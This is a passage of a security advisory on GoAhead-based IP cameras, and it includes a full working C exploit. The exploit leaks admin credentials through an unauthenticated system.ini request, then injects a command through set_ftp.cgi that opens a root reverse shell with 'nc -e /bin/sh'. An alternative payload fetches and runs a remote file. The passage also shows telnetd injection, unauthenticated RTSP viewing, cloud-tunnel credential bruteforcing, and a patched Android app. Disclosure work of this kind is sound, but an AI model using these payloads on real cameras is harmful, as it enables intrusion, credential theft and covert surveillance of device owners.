7600 0000 0000 0000 0000 0000 t.gov........... \n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n[...] 
\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................ \n[...] \nuser@kali$ \n \n \nTo browse `.cgi` files, an attacker needs to authenticate too: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS' \nvar result=\"Auth Failed\"; \nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas' \nvar result=\"Auth Failed\"; \n \nBut it appears access to `.ini` files are not correctly checked. The \nattacker can bypass the authentication \nby providing an empty `loginuse` and an empty `loginpas` in the URI: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less \n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM......... \n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................ \n[...] \n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n[...] \n \n \nA PoC is provided: \n \n./expl 192.168.1.107 --get-config | xxd | grep 000003 \n \n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass \n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................ \n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................ \n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin. \n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin. \n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................ \n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................ \n \nThis vulnerability allows an attacker to steal credentials, ftp \naccounts and smtp accounts (email). \n \n \n \n## Details - Authenticated RCE as root \n \nA RCE exists in the ftp configuration CGI. This is well-documented as \nshown https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html \nand https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/ \nin several different camera models. \n \nThe partition `/` is mounted in Read-Only, so modifications are not \npossible in this partition. 
\n \nThe command injection is located in `set_ftp.cgi` (see `$(ftp x.com)`): \n \nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp \nx.com)ftp&dir=/&mode=PORT&upload_interval=0 \nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin \n \nWhen doing a tcpdump, we can see the DNS resolution for x.com: \n \n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23) \n \nSo `ftp x.com` is executed. \n \nWe can use the telnetd binary to start an unauthenticated telnetd access: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd \n-p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0' \nuser@kali$ wget -qO- \n'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin' \n \n \nTesting this will give us a root account on port 25/tcp: \n \nuser@kali$ telnet 192.168.1.107 25 \nTrying 192.168.1.107... \nConnected to 192.168.1.107. \nEscape character is '^]'. \n \n/ # id \nuid=0(root) gid=0 \n/ # uname -ap \nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 \nmips GNU/Linux \n/ # mount \nrootfs on / type rootfs (rw) \n/dev/root on / type squashfs (ro,relatime) \n/proc on /proc type proc (rw,relatime) \nsysfs on /sys type sysfs (rw,relatime) \ntmpfs on /dev type tmpfs (rw,relatime,size=2048k) \ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k) \ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000) \n/dev/mtdblock3 on /system type jffs2 (rw,relatime) \n/ # \n \n`/etc` is read-only. So, command injection must not write into \n`/etc`. The injection is located in `/tmp/ftpupload.sh`: \n \n/ # cat /tmp/ftpupload.sh \n/bin/ftp -n<<! \nopen 192.168.1.1 21 \nuser ftp $(telnetd -l /bin/sh -p 25)ftp \nbinary \nlcd /tmp \nput ftptest.txt \nclose \nbye \n! 
\n/ # \n \n \n \n## Details - Pre-Auth RCE as root \n \nBy combining the Pre-Auth Info Leak within the GoAhead http server \nvulnerability and then authenticated RCE as root, an attacker can \nachieve a pre-auth RCE as root on a LAN or on the Internet. \n \nAn exploit is provided and can be used to get a root RCE with connect-back. \n \nThe exploit will: \n \n1. extract the valid credentials by connecting to the remote GoAhead \nHTTP server of the targeted camera \n2. plant a connect-back with `nc` \n3. execute the payload \n4. the attacker will receive a root shell with netcat on a second terminal \n5. clean the payload located in the configuration file \n \n \nIt affects 1250+ camera models. \n \n \nDemo: \n \nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl \n192.168.1.107 \nCamera 0day root RCE with connect-back @PierreKimSec \n \nPlease run `nc -vlp 1337` on 192.168.1.1 \n \n[+] bypassing auth ... done \nlogin = admin \npass = admin \n[+] planting payload ... done \n[+] executing payload ... done \n[+] cleaning payload ... done \n[+] cleaning payload ... done \n[+] enjoy your root shell on 192.168.1.1:1337 \nuser@kali$ \n \n \nOn the second xterm: \n \nuser@kali$ nc -lvp 1337 \nlistening on [any] 1337 ... 
\n192.168.1.107: inverse host lookup failed: Unknown host \nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968 \nid \nuid=0(root) gid=0 \nuname -ap \nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 \nmips GNU/Linux \nps \nPID USER TIME COMMAND \n1 root 0:01 {linuxrc} init \n2 root 0:00 [kthreadd] \n3 root 0:00 [ksoftirqd/0] \n5 root 0:00 [kworker/0:0H] \n6 root 0:00 [kworker/u2:0] \n7 root 0:00 [rcu_preempt] \n8 root 0:00 [rcu_bh] \n9 root 0:00 [rcu_sched] \n10 root 0:00 [watchdog/0] \n11 root 0:00 [khelper] \n12 root 0:00 [writeback] \n13 root 0:00 [bioset] \n14 root 0:00 [kblockd] \n15 root 0:00 [khubd] \n16 root 0:00 [kworker/0:1] \n17 root 0:00 [cfg80211] \n18 root 0:00 [rpciod] \n19 root 0:00 [kswapd0] \n20 root 0:00 [fsnotify_mark] \n21 root 0:00 [nfsiod] \n22 root 0:00 [crypto] \n36 root 0:00 [kworker/u2:1] \n39 root 0:00 [i2s_work_1] \n40 root 0:00 [i2s_codec_irq_w] \n41 root 0:00 [kworker/0:2] \n42 root 0:00 [deferwq] \n43 root 0:00 [kworker/0:1H] \n59 root 0:00 [jffs2_gcd_mtd3] \n61 root 0:00 telnetd \n69 root 0:00 /system/system/bin/wifidaemon \n70 root 0:00 /sbin/getty -L ttyS1 115200 vt100 \n98 root 0:01 [RtmpTimerTask] \n99 root 0:00 [RtmpMlmeTask] \n100 root 0:00 [RtmpCmdQTask] \n101 root 0:00 [RtmpWscTask] \n148 root 1:19 /tmp/encoder \n164 root 0:00 [irq/37-isp] \n236 root 0:07 [apical_isp_fw_p] \n2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt \n2331 root 0:00 {exe} ash /tmp/ftpupload.sh \n2332 root 0:00 {exe} ash /tmp/ftpupload.sh \n2333 root 0:00 /bin/ftp -n \n2334 root 0:00 /bin/sh \n2439 root 0:00 ps \n \n \nA working exploit is provided: \n \n \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <arpa/inet.h> \n#include <netinet/in.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n \n \n#define CAM_PORT 80 \n#define REMOTE_HOST \"192.168.1.1\" \n#define REMOTE_PORT \"1337\" \n#define PAYLOAD_0 \"GET 
\n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" \nREMOTE_HOST \"+\" REMOTE_PORT \n\"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n#define PAYLOAD_1 \"GET \n/ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\" \n#define PAYLOAD_2 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n \n \n#define ALTERNATIVE_PAYLOAD_zero0 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" \nREMOTE_HOST \"+\" REMOTE_PORT \n\"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n#define ALTERNATIVE_PAYLOAD_zero1 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" \nREMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n \nchar * creds(char *argv, \nint get_config); \n \nint rce(char *argv, \nchar *id, \nchar attack[], \nchar desc[]); \n \n \nint main(int argc, \nchar **argv, \nchar **envp) \n{ \nchar *id; \n \nprintf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\"); \n \nif (argc < 2) \n{ \nprintf(\"%s target\\n\", argv[0]); \nprintf(\"%s target --get-config will dump the configuration \nand exit\\n\", argv[0]); \nreturn (1); \n} \n \nif (argc == 2) \nprintf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST); \n \nif (argc == 3 && !strcmp(argv[2], \"--get-config\")) \nid = creds(argv[1], 1); \nelse \nid = creds(argv[1], 0); \n \nif (id == NULL) \n{ \nprintf(\"exploit failed\\n\"); \nreturn (1); \n} \nprintf(\"done\\n\"); \n \nprintf(\" login = %s\\n\", id); \nprintf(\" pass = %s\\n\", id + 32); \n \nif (!rce(argv[1], id, PAYLOAD_0, \"planting\")) \nprintf(\"done\\n\"); \nsleep(1); \nif (!rce(argv[1], id, PAYLOAD_1, \"executing\")) \nprintf(\"done\\n\"); \nif (!rce(argv[1], id, 
PAYLOAD_2, \"cleaning\")) \nprintf(\"done\\n\"); \nif (!rce(argv[1], id, PAYLOAD_1, \"cleaning\")) \nprintf(\"done\\n\"); \n \nprintf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT); \n \nreturn (0); \n} \n \n \nchar * creds(char *argv, \nint get_config) \n{ \nint sock; \nint n; \nstruct sockaddr_in serv_addr; \nchar buf[8192] = { 0 }; \nchar *out; \nchar *tmp; \nchar payload[] = \"GET /system.ini?loginuse&loginpas \nHTTP/1.0\\r\\n\\r\\n\"; \nint old_n; \nint n_total; \n \n \nsock = 0; \nn = 0; \nold_n = 0; \nn_total = 0; \n \nprintf(\"[+] bypassing auth ... \"); \n \nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) \n{ \nprintf(\"Error while creating socket\\n\"); \nreturn (NULL); \n} \n \nmemset(&serv_addr, '0', sizeof(serv_addr)); \nserv_addr.sin_family = AF_INET; \nserv_addr.sin_port = htons(CAM_PORT); \n \nif (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0) \n{ \nprintf(\"Error while inet_pton\\n\"); \nreturn (NULL); \n} \n \nif (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0) \n{ \nprintf(\"creds: connect failed\\n\"); \nreturn (NULL); \n} \n \nif (send(sock, payload, strlen(payload) , 0) < 0) \n{ \nprintf(\"creds: send failed\\n\"); \nreturn (NULL); \n} \n \nif (!(tmp = malloc(10 * 1024 * sizeof(char)))) \nreturn (NULL); \n \nif (!(out = calloc(64, sizeof(char)))) \nreturn (NULL); \n \nwhile ((n = recv(sock, buf, sizeof(buf), 0)) > 0) \n{ \nn_total += n; \nif (n_total < 1024 * 10) \nmemcpy(tmp + old_n, buf, n); \nif (n >= 0) \nold_n = n; \n} \n \nclose(sock); \n \n/* \n[ HTTP HEADERS ] \n... \n \n000????: 0000 0a0a 0a0a 01.. .... .... .... .... \n^^^^ ^^^^ ^^ \nUseful reference in the binary data \nin order to to find the positions of \ncredentials \n... \n... \n0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... 
\n00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n... \n \nNOTE: reference can be too: \n000????: 0006 0606 0606 0100 000a .... .... .... \n \nOther method: parse everything, find the \"admin\" string and extract \nthe associated password \nby adding 31bytes after the address of 'a'[dmin]. \nWorks if the login is admin (seems to be this by default, but can be \nchanged by the user) \n*/ \n \nif (get_config) \n{ \nfor (unsigned int j = 0; j < n_total && j < 10 * 1024; j++) \nprintf(\"%c\", tmp[j]); \nexit (0); \n} \n \n \nfor (unsigned int j = 50; j < 10 * 1024; j++) \n{ \nif (tmp[j - 4] == 0x0a && \ntmp[j - 3] == 0x0a && \ntmp[j - 2] == 0x0a && \ntmp[j - 1] == 0x0a && \ntmp[j] == 0x01) \n{ \nif (j + 170 < 10 * 1024) \n{ \nstrcat(out, &tmp[j + 138]); \nstrcat(out + 32 * sizeof(char), &tmp[j + 170]); \nfree(tmp); \n \nreturn (out); \n} \n} \n} \n \nfree(tmp); \n \nreturn (NULL); \n} \n \nint rce(char *argv, \nchar *id, \nchar attack[], \nchar desc[]) \n{ \nint sock; \nstruct sockaddr_in serv_addr; \nchar *payload; \n \nif (!(payload = calloc(512, sizeof(char)))) \nreturn (1); \n \nsock = 0; \n \nprintf(\"[+] %s payload ... \", desc); \n \nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) \n{ \nprintf(\"Error while creating socket\\n\"); \nreturn (1); \n} \n \nmemset(&serv_addr, '0', sizeof(serv_addr)); \nserv_addr.sin_family = AF_INET; \nserv_addr.sin_port = htons(CAM_PORT); \n \nif (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0) \n{ \nprintf(\"Error while inet_pton\\n\"); \nreturn (1); \n} \n \nif (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0) \n{ \nprintf(\"rce: connect failed\\n\"); \nreturn (1); \n} \n \n \nsprintf(payload, attack, id, id + 32); \nif (send(sock, payload, strlen(payload) , 0) < 0) \n{ \nprintf(\"rce: send failed\\n\"); \nreturn (1); \n} \n \nreturn (0); \n} \n \nAlternatively, you can fetch it at \nhttps://pierrekim.github.io/advisories/expl-goahead-camera.c. 
\n \n \n \n## Details -- Misc - Streaming without authentication \n \nAn attacker can use the authenticated-less RTSP server running on the \ncamera on port `10554/tcp` to watch the streaming without \nauthentication. \n \nuser@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1 \n \nAnd: \n \nuser@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0 \n \n \n \n## Details -- Misc - \"Cloud\" (Aka Botnet) \n \nBy default, the camera uses a 'Cloud' functionality. \n \nYou can tcpdump the traffic of the camera, which is very scary: \n \n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? \nopenapi.xg.qq.com.gateway. (43) \n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ \nA? openapi.xg.qq.com.gateway. (43) \n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? \nwww.baidu.com. (31) \n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48 \n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48 \n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48 \n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ \nA? www.baidu.com. (31) \n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? \nwww.baidu.com. (31) \n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ \nA? www.baidu.com. (31) \n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? \nwww.baidu.com.gateway. (39) \n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ \nA? www.baidu.com.gateway. (39) \n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? \nwww.baidu.com.gateway. (39) \n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell \n192.168.1.107, length 46 \n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28 \n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ \nA? www.baidu.com.gateway. (39) \n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? \ntime.nist.gov. 
(31) \n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ \nA? time.nist.gov. (31) \n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48 \n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48 \n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48 \n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? \ntime.nist.gov. (31) \n \n \nThe camera tries to resolve `www.baidu.com` and `openapi.xg.qq.com`, and \ncontacts hardcoded IPs and hosts: \n \n- - `121.42.208.86:32100/udp` (CN: Alibaba), \n- - `54.221.213.97:32100/udp` (AWS US), \n- - `120.24.37.48:32100/udp` (CN: Alibaba), \n- - `www.baidu.com:80/tcp` (CN: Baidu). \n \nIt appears this is the 'Cloud' functionality, enabled by default. The \nsecurity of this functionality is not proven. \n \n \nThe provided Android application to manage my camera is \nobject.p2pwificam.client.apk \n[https://play.google.com/store/apps/details?id=object.p2pwificam.client]. \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \nNetcam 360 works too: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \nIt appears the network protocol is very weak: \n \n1. the camera contacts a remote server using UDP, \n2. the application contacts a remote server using UDP, \n3. the application sends a request to the remote server, asking if the \ncamera with the specific serial-number is online, \n4. the server will reply with \"camera doesn't exit\", \"camera is offline\" \nor \"camera is online\", \n5. if the camera is online, a UDP tunnel is automatically established \nbetween the application and the camera, using the Cloud server as a \nrelay. 
\n \n \n### UDP tunnel: \n \n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera] \n \n \nThen, the UDP tunnel is used by the application to reach the camera: \n \n1/ the client will send an HTTP request to the camera with the \ncredentials (still in clear-text) \n \nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \nor \n \nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \n \n2/ the camera will reply by using HTTP over UDP whether the \ncredentials are valid or invalid. \n \nIf the credentials are valid, the camera will reply: \n \nresult= 0; \n \nIf the credentials are not valid, the camera will reply: \n \nresult=-1 \n \n \n3/ if the credentials are valid, then the application will send HTTP \nrequests to .cgi files hosted by the camera by appending credentials \nto the requests (`?loginuse=valid_user&loginpas=valid_pass`) \n \n \n \n \n### Step 2 in detail: \n \nIf the authentication is OK, it is then alright to dump all the \nconfiguration in cleartext! \n \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \nNote: this trace was done with one of the applications listed below, to \nbe sure applications are sharing the same \"cloud\" network (it appears \nthe daemon running on the camera doesn't strictly respect the HTTP \nprotocol - note the lack of `/` - but it works!). \n \n \nIf the authentication is not OK, the camera answers: \n \nresult=-1; \n \nDue to the absence of checking, an attacker can simply bruteforce credentials. 
\n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \n### Step 3 in detail: \n \nThe application sends: \n \nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \nOR \n \nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \n \n \nThe camera replies by sending all its configuration in clear-text: \n \n \nvar now=1122211111; \nvar dst_enable=0; \nvar dst_time=0; \nvar tz=0; \nvar ntp_enable=1; \nvar ntp_svr=\"time.nist.gov\"; \nvar dhcpen=1; \nvar ip=\"192.168.2.76\"; \nvar mask=\"255.255.255.0\"; \nvar gateway=\"192.168.2.1\"; \nvar dns1=\"8.8.8.8\"; \nvar dns2=\"192.168.2.1\"; \nvar port=80; \nvar nashost=\"\"; \nvar nasport=0; \nvar dev2_host=\"\"; \nvar dev2_alias=\"\"; \nvar dev2_user=\"\"; \nvar dev2_pwd=\"\"; \nvar dev2_port=0; \nvar dev3_host=\"\"; \nvar dev3_alias=\"\"; \nvar dev3_user=\"\"; \nvar dev3_pwd=\"\"; \nvar dev3_port=0; \nvar dev4_host=\"\"; \nvar dev4_alias=\"\"; \nvar dev4_user=\"\"; \nvar dev4_pwd=\"\"; \nvar dev4_port=0; \nvar dev5_host=\"\"; \nvar dev5_alias=\"\"; \nvar dev5_user=\"\"; \nvar dev5_pwd=\"\"; \nvar dev5_port=0; \nvar dev6_host=\"\"; \nvar dev6_alias \n[...] \nvar user1_name=\"\"; \nvar user1_pwd=\"\"; \nvar user2_name=\"wut\"; \nvar user2_pwd=\"wut\"; \nvar user3_name=\"admin\"; \nvar user3_pwd=\"admin\"; \n[...] \n \n \n \n \n \n \n \n \n \nThis is interesting because an attacker can reach a camera only by \nknowing a serial number. The UDP tunnel between the attacker and the \ncamera is established even if the attacker doesn't know the \ncredentials. It's useful to note the tunnel bypasses NAT and firewall, \nallowing the attacker to reach internal cameras (if they are connected \nto the Internet) and to bruteforce credentials. 
\nThen, the attacker can just try to bruteforce credentials of the camera: \n \nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST& \n \n \n \n \nThis protocol appears to be common to a lot of Android applications, ie: \n \n- - object.p2pwificam.client \n(https://play.google.com/store/apps/details?id=object.p2pwificam.client) \n(500.000 - 1.000.000 installations) \n- - hsl.p2pipcam \n(https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 \n- 500.000 installations) \n- - object.liouzx.client \n(https://play.google.com/store/apps/details?id=object.liouzx.client) \n(100.000 - 500.000 installations) \n- - object.lioupp.client \n(https://play.google.com/store/apps/details?id=object.lioupp.client) \n(100.000 - 500.000 installations) \n- - com.g_zhang.myp2pcam \n(https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) \n(100.000 - 500.000 installations) \n- - object.aisaidezx.client \n(https://play.google.com/store/apps/details?id=object.aisaidezx.client) \n(50.000 - 100.000 installations) \n- - hsl.cam360 (https://play.google.com/store/apps/details?id=hsl.cam360) \n(10.000 - 50.000 installations) \n- - bravocam.p2pipcam \n(https://play.google.com/store/apps/details?id=bravocam.p2pipcam) \n(10.000 - 50.000 installations) \n- - xcam.p2pipcam \n(https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 \n- 50.000 installations) \n- - snugcam.p2pipcam \n(https://play.google.com/store/apps/details?id=snugcam.p2pipcam) \n(10.000 - 50.000 installations) \n- - myview.p2pipcam \n(https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 \n- 10.000 installations) \n- - object.weimaisizx.client \n(https://play.google.com/store/apps/details?id=object.weimaisizx.client) \n(10.000 - 50.000 installations) \n- - com.tutk.P2PCamLive.Pixord \n(https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) \n(10.000 - 50.000 installations) \n- - object.p2pnetwork.client 
\n(https://play.google.com/store/apps/details?id=object.p2pnetwork.client) \n(5.000 - 10.000 installations) \n \nThis list is very far from being complete. \n \n \n \n \nSo, I modified the original Android Application in order to try the \npre-auth Info-Leak vulnerability: \n \n \n \nk% ls -la \ntotal 14912 \ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 . \ndrwxrwxrwt 3 root root 140 Mar 7 08:25 .. \n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool \n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar \n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 \nobject.p2pwificam.client.apk \nk% ./apktool d object.p2pwificam.client.apk \nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk \nI: Loading resource table... \nI: Decoding AndroidManifest.xml with resources... \nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead... \nS: Please be aware this is a volatile directory and frameworks \ncould go missing, please utilize --frame-path if the default storage \ndirectory is unavailable \nI: Loading resource table from file: \n/tmp/.local/share/apktool/framework/1.apk \nI: Regular manifest package... \nI: Decoding file-resources... \nI: Decoding values */* XMLs... \nI: Baksmaling classes.dex... \nI: Copying assets and libs... \nI: Copying unknown files... \nI: Copying original files... \nk% \n \n \nI edit the library which manages all the custom HTTP requests. 
\n \nOne of the interesting string is `GET \n/%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`: \n \nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so \n \n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l \n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user= \n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID: \n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com \n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con \n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s. \n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai \n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return: \n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou \n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con \n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m \n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle: \n \n \nAfter the modification: \n \n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi \n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x \n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID: \n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com \n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con \n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s. \n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai \n \n \n \n \nThen, let's repack and sign the .apk: \n \nk% ./apktool b object.p2pwificam.client \nI: Using Apktool 2.2.2 \nI: Checking whether sources has changed... \nI: Checking whether 